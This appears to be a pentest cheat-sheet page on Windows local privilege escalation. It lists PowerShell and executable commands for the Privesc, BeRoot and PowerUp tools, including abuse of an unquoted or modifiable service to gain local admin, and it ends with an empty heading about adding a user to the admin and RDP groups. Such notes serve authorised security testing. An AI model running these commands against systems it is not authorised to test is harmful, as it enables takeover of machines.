Local Privilege Escalation

Privesc check all

https://github.com/enjoiz/Privescarrow-up-right

. .\privesc.ps1
Invoke-PrivEsc

Beroot check all

https://github.com/AlessandroZ/BeRootarrow-up-right

./beRoot.exe

Run powerup check all

https://github.com/HarmJ0y/PowerUparrow-up-right

. ./powerup
Invoke-allchecks

Run powerup get services with unqouted paths and a space in their name

Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose

Abuse service to get local admin permissions with powerup

Invoke-ServiceAbuse
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<domain>\<username>'

Add user to local admin and RDP group and enable RDP on firewall

Jekins

Last updated